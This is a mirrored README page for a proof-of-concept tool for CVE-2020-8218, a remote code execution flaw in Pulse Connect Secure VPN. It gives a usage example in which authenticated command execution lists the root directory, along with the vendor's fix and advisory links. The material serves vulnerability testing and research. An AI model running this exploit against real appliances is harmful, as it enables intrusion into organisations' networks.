Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-8218 PoC — Pulse Secure Pulse Connect Secure 代码注入漏洞

Source
https://github.com/withdk/pulse-gosecure-rce-poc
Associated Vulnerability
Title:Pulse Secure Pulse Connect Secure 代码注入漏洞 (CVE-2020-8218)
Description:Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。 Pulse Secure PCS 9.1RB之前版本中存在代码注入漏洞。攻击者可借助特制的URI利用该漏洞执行任意代码。
Description
Tool to test for existence of CVE-2020-8218
Readme
# pulse-gosecure-rce

```
          _____                    _____                    _____            _____                    _____          
         /\    \                  /\    \                  /\    \          /\    \                  /\    \         
        /::\    \                /::\____\                /::\____\        /::\    \                /::\    \        
       /::::\    \              /:::/    /               /:::/    /       /::::\    \              /::::\    \       
      /::::::\    \            /:::/    /               /:::/    /       /::::::\    \            /::::::\    \      
     /:::/\:::\    \          /:::/    /               /:::/    /       /:::/\:::\    \          /:::/\:::\    \     
    /:::/__\:::\    \        /:::/    /               /:::/    /       /:::/__\:::\    \        /:::/__\:::\    \    
   /::::\   \:::\    \      /:::/    /               /:::/    /        \:::\   \:::\    \      /::::\   \:::\    \   
  /::::::\   \:::\    \    /:::/    /      _____    /:::/    /       ___\:::\   \:::\    \    /::::::\   \:::\    \  
 /:::/\:::\   \:::\____\  /:::/____/      /\    \  /:::/    /       /\   \:::\   \:::\    \  /:::/\:::\   \:::\    \ 
/:::/  \:::\   \:::|    ||:::|    /      /::\____\/:::/____/       /::\   \:::\   \:::\____\/:::/__\:::\   \:::\____\
\::/    \:::\  /:::|____||:::|____\     /:::/    /\:::\    \       \:::\   \:::\   \::/    /\:::\   \:::\   \::/    /
 \/_____/\:::\/:::/    /  \:::\    \   /:::/    /  \:::\    \       \:::\   \:::\   \/____/  \:::\   \:::\   \/____/ 
          \::::::/    /    \:::\    \ /:::/    /    \:::\    \       \:::\   \:::\    \       \:::\   \:::\    \     
           \::::/    /      \:::\    /:::/    /      \:::\    \       \:::\   \:::\____\       \:::\   \:::\____\    
            \::/____/        \:::\__/:::/    /        \:::\    \       \:::\  /:::/    /        \:::\   \::/    /    
             ~~               \::::::::/    /          \:::\    \       \:::\/:::/    /          \:::\   \/____/     
                               \::::::/    /            \:::\    \       \::::::/    /            \:::\    \         
                                \::::/    /              \:::\____\       \::::/    /              \:::\____\        
                                 \::/____/                \::/    /        \::/    /                \::/    /        
                                  ~~                       \/____/          \/____/                  \/____/         
  ```                                                                                                                   

## About
Proof of concept tool to test for the existence of Pulse Secure RCE (CVE-2020-8218) and to encourage further research. This tool was built around the POC from the GoSecure advisory. All credit to them for the finding. 

## Recommended Fix
As recommended by Pulse Secure:
***"The solution for these vulnerabilities is to upgrade the Pulse Connect Secure and Pulse Policy Secure server software version to the 9.1R8. This following PCS/PPS version can be downloaded from https://my.pulsesecure.net."***

## References
* https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44516/?kA23Z000000L6i5SAC
* https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/

## Usage
```
Example usage:
withdk@hogwarts source % python pulse-gosecure-rce.py -u https://192.168.1.120 --user admin --password mypassword
[*] Successfully logged in
(Cmd) ls /
[*] Sending cmd ls /
[*] Sending exploit...
[*] Getting output...
******************************************
2.6.32.358-x86_64
bin
boot
cgroups
data
dev
etc
home
lib
lib64
modules
opt
pkg
proc
runtime
sbin
sys
tmp
usr
va
var
webserver

******************************************
(Cmd) exit
Bye
[*] Getting logout URL
[*] Sending logout URL
[*] Successfully logged out.
```

DK @withdk  
September 2020

## Disclaimer
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
File Snapshot

 [4.0K]  /data/pocs/8b1a8a5e6f440483eeda2a20466028b1d9e20645
├── [ 34K]  LICENSE
├── [8.8K]  pulse-gosecure-rce.py
├── [4.3K]  README.md
└── [  34]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.